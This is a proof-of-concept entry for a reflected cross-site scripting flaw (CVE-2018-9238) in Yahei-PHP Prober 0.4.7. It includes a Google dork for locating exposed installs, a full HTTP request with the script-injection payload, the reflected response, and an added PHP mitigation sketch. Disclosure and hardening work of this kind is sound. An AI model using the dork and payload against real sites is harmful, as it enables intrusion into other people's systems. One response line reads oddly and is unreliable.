CVE-2018-9238

ManhNho, Apr 4th, 2018
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Category: Webapps

-----------------------------------------------------
PoC
-----------------------------------------------------
Request:

POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1

pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=

-----------------------------------------------------
Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results support the position: 错误')</script></table>
-----------------------------------------------------
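
Mitigation sketch (an added example, not part of the original paste and not Yahei-PHP Prober source code): the response above shows funName landing inside a single-quoted JavaScript string in a <script> block, so the fix is to allow-list the function name and encode it for that context. The function names and the vulnerable template below are assumptions reconstructed from the response.

```php
<?php
// Added example, not Yahei-PHP Prober source. Function names are hypothetical;
// the vulnerable template is inferred from the response shown above.

// Assumed vulnerable pattern: request value concatenated into a JS string.
function render_vulnerable(string $funName, string $result): string
{
    return "<script>alert('Function" . $funName
        . "Test results support the position: " . $result . "')</script>";
}

// Encode a value as a JS string literal that is safe inside an HTML <script>
// block: <, >, &, ' and " become \uXXXX, so "</script>" cannot end the block.
function js_string(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
        | JSON_INVALID_UTF8_SUBSTITUTE; // PHP 7.2+
    return json_encode($s, $flags) ?: '""';
}

// Hardened: allow-list the shape of a PHP function name, then encode.
function render_hardened(string $funName, string $result): string
{
    if (!preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,127}\z/', $funName)) {
        return '<script>alert(' . js_string('Invalid function name') . ')</script>';
    }
    $msg = "Function {$funName}. Test results support the position: {$result}";
    return '<script>alert(' . js_string($msg) . ')</script>';
}

// Value carried by funName in the request above, URL-decoded.
$payload = '\')</script><script>alert("1");</script>';

echo render_vulnerable($payload, '错误'), "\n"; // reproduces the reflected markup
echo js_string($payload), "\n";                 // same characters, inert as data
echo render_hardened($payload, '错误'), "\n";   // rejected by the allow-list
echo render_hardened('phpinfo', 'ok'), "\n";    // constructed legitimate input
```

The allow-list alone stops this input; the encoding step is what keeps the output safe if the accepted character set is ever widened.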